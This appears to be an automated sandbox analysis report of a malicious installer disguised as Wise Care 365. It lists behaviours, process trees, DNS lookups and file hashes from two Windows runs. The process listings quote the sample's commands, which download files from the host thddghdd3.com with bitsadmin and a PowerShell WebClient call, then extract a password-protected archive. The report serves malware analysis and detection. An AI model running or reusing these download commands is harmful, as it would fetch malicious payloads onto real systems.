Analysis Overview
SHA256
9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da
Threat Level: Known bad
The file 9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe was found to be: Known bad.
Malicious Activity Summary
Download via BitsAdmin
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-26 04:49
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-26 04:49
Reported
2024-07-26 04:52
Platform
win7-20240704-en
Max time kernel
148s
Max time network
124s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
| N/A | N/A | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe
"C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"
C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp" /SL5="$C0150,38098121,731648,C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\main.bat" "
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"
C:\ProgramData\ConsoleApp\7za.exe
7za.exe x -y -p1r7d2kvUf3 "*.7z"
C:\Windows\SysWOW64\timeout.exe
timeout /T 3 /NOBREAK
C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe
"C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe"
C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$301D2,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | thddghdd3.com | udp |
| US | 8.8.8.8:53 | thddghdd3.com | udp |
Files
memory/2920-0-0x0000000000400000-0x00000000004C0000-memory.dmp
memory/2920-2-0x0000000000401000-0x00000000004A9000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-NAOMN.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
| MD5 | f098bb35dca6ae44a05c65aac7a5444b |
| SHA1 | c5c50d740c1b8e9d8715fc3b2c8026156295a437 |
| SHA256 | 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe |
| SHA512 | 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b |
memory/1284-12-0x0000000000400000-0x000000000067B000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\ProgramData\ConsoleApp\ControlSet000.bat
| MD5 | 484c8df5d5bd9d82f4ac1861472cf519 |
| SHA1 | eddc0d20c81d9dba14ee0be32c7c5f563481e792 |
| SHA256 | f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953 |
| SHA512 | 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7 |
C:\ProgramData\ConsoleApp\main.bat
| MD5 | 0ddc6dd98f86cff7e50c1621fd16b55a |
| SHA1 | 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a |
| SHA256 | b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6 |
| SHA512 | 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609 |
\ProgramData\ConsoleApp\7za.exe
| MD5 | c3d309156b8e8cf1d158de5fab1c2b40 |
| SHA1 | 58ad15d91abac2c6203e389ac8a8ff6685406d41 |
| SHA256 | 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c |
| SHA512 | 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498 |
memory/2920-57-0x0000000000400000-0x00000000004C0000-memory.dmp
memory/1284-58-0x0000000000400000-0x000000000067B000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-7SHRH.tmp\Wise Care 365 5.9.1.582.exe
| MD5 | 05fda662bb382c2c95b9318b2394b246 |
| SHA1 | 69365314afb6102209a806e0e474d94e58207ec6 |
| SHA256 | 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2 |
| SHA512 | b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312 |
memory/2688-66-0x0000000000400000-0x0000000000417000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-O1A90.tmp\Wise Care 365 5.9.1.582.tmp
| MD5 | 9d7850e858c24db77b91b25adf93812f |
| SHA1 | f0bb0a9074b38dad7492422247c0a316197d26b6 |
| SHA256 | c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8 |
| SHA512 | e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec |
\Users\Admin\AppData\Local\Temp\is-P3A9Q.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-P3A9Q.tmp\ISTask.dll
| MD5 | 86a1311d51c00b278cb7f27796ea442e |
| SHA1 | ac08ac9d08f8f5380e2a9a65f4117862aa861a19 |
| SHA256 | e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d |
| SHA512 | 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec |
memory/1832-84-0x0000000000690000-0x00000000006A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-P3A9Q.tmp\VclStylesInno.dll
| MD5 | b0ca93ceb050a2feff0b19e65072bbb5 |
| SHA1 | 7ebbbbe2d2acd8fd516f824338d254a33b69f08d |
| SHA256 | 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246 |
| SHA512 | 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2 |
memory/1832-90-0x0000000000670000-0x0000000000671000-memory.dmp
memory/1832-88-0x00000000070E0000-0x00000000073FA000-memory.dmp
memory/1832-91-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-93-0x00000000006B0000-0x00000000006B1000-memory.dmp
memory/1832-94-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-92-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-95-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-96-0x00000000006C0000-0x00000000006C1000-memory.dmp
memory/1832-97-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-98-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-99-0x00000000006D0000-0x00000000006D1000-memory.dmp
memory/1832-100-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-102-0x0000000001E90000-0x0000000001E91000-memory.dmp
memory/1832-101-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-103-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-104-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-105-0x0000000002490000-0x0000000002491000-memory.dmp
memory/1832-106-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-107-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-111-0x0000000007550000-0x0000000007551000-memory.dmp
memory/1832-110-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-109-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-108-0x0000000007540000-0x0000000007541000-memory.dmp
memory/1832-112-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-113-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-114-0x0000000007560000-0x0000000007561000-memory.dmp
memory/1832-115-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-116-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-118-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-119-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-133-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-145-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-144-0x0000000007600000-0x0000000007601000-memory.dmp
memory/1832-143-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-142-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-141-0x00000000075F0000-0x00000000075F1000-memory.dmp
memory/1832-140-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-139-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-138-0x00000000075E0000-0x00000000075E1000-memory.dmp
memory/1832-137-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-136-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-135-0x00000000075D0000-0x00000000075D1000-memory.dmp
memory/1832-134-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-132-0x00000000075C0000-0x00000000075C1000-memory.dmp
memory/1832-131-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-130-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-129-0x00000000075B0000-0x00000000075B1000-memory.dmp
memory/1832-128-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-127-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-126-0x00000000075A0000-0x00000000075A1000-memory.dmp
memory/1832-125-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-124-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-123-0x0000000007590000-0x0000000007591000-memory.dmp
memory/1832-122-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-121-0x0000000007400000-0x0000000007540000-memory.dmp
memory/1832-120-0x0000000007580000-0x0000000007581000-memory.dmp
memory/1832-117-0x0000000007570000-0x0000000007571000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-26 04:49
Reported
2024-07-26 04:52
Platform
win10v2004-20240709-en
Max time kernel
142s
Max time network
125s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
| N/A | N/A | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\ConsoleApp\7za.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe
"C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"
C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp" /SL5="$40210,38098121,731648,C:\Users\Admin\AppData\Local\Temp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml
C:\ProgramData\ConsoleApp\7za.exe
7za.exe x -y -p1r7d2kvUf3 "*.7z"
C:\Windows\SysWOW64\timeout.exe
timeout /T 3 /NOBREAK
C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe
"C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe"
C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$20276,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thddghdd3.com | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/1684-1-0x0000000000400000-0x00000000004C0000-memory.dmp
memory/1684-2-0x0000000000401000-0x00000000004A9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-LUUPC.tmp\9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da.tmp
| MD5 | f098bb35dca6ae44a05c65aac7a5444b |
| SHA1 | c5c50d740c1b8e9d8715fc3b2c8026156295a437 |
| SHA256 | 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe |
| SHA512 | 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b |
memory/3960-6-0x0000000000400000-0x000000000067B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\ProgramData\ConsoleApp\ControlSet000.bat
| MD5 | 484c8df5d5bd9d82f4ac1861472cf519 |
| SHA1 | eddc0d20c81d9dba14ee0be32c7c5f563481e792 |
| SHA256 | f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953 |
| SHA512 | 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7 |
C:\ProgramData\ConsoleApp\main.bat
| MD5 | 0ddc6dd98f86cff7e50c1621fd16b55a |
| SHA1 | 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a |
| SHA256 | b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6 |
| SHA512 | 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609 |
memory/3124-25-0x0000000072B0E000-0x0000000072B0F000-memory.dmp
memory/3124-26-0x0000000004C70000-0x0000000004CA6000-memory.dmp
memory/3124-27-0x0000000005410000-0x0000000005A38000-memory.dmp
memory/3124-28-0x0000000005250000-0x0000000005272000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_taajmkf4.od4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3124-29-0x0000000005B40000-0x0000000005BA6000-memory.dmp
memory/3124-30-0x0000000005BB0000-0x0000000005C16000-memory.dmp
memory/3124-40-0x0000000005D20000-0x0000000006074000-memory.dmp
memory/3124-41-0x0000000006200000-0x000000000621E000-memory.dmp
memory/3124-42-0x0000000006250000-0x000000000629C000-memory.dmp
memory/3124-43-0x0000000007870000-0x0000000007EEA000-memory.dmp
memory/3124-44-0x0000000006710000-0x000000000672A000-memory.dmp
C:\ProgramData\ConsoleApp\7za.exe
| MD5 | c3d309156b8e8cf1d158de5fab1c2b40 |
| SHA1 | 58ad15d91abac2c6203e389ac8a8ff6685406d41 |
| SHA256 | 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c |
| SHA512 | 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498 |
C:\Users\Admin\AppData\Local\Temp\is-9CMST.tmp\Wise Care 365 5.9.1.582.exe
| MD5 | 05fda662bb382c2c95b9318b2394b246 |
| SHA1 | 69365314afb6102209a806e0e474d94e58207ec6 |
| SHA256 | 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2 |
| SHA512 | b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312 |
memory/5088-52-0x0000000000400000-0x0000000000417000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-DRTD1.tmp\Wise Care 365 5.9.1.582.tmp
| MD5 | 9d7850e858c24db77b91b25adf93812f |
| SHA1 | f0bb0a9074b38dad7492422247c0a316197d26b6 |
| SHA256 | c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8 |
| SHA512 | e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec |
memory/928-68-0x0000000007130000-0x0000000007146000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-SQCH2.tmp\ISTask.dll
| MD5 | 86a1311d51c00b278cb7f27796ea442e |
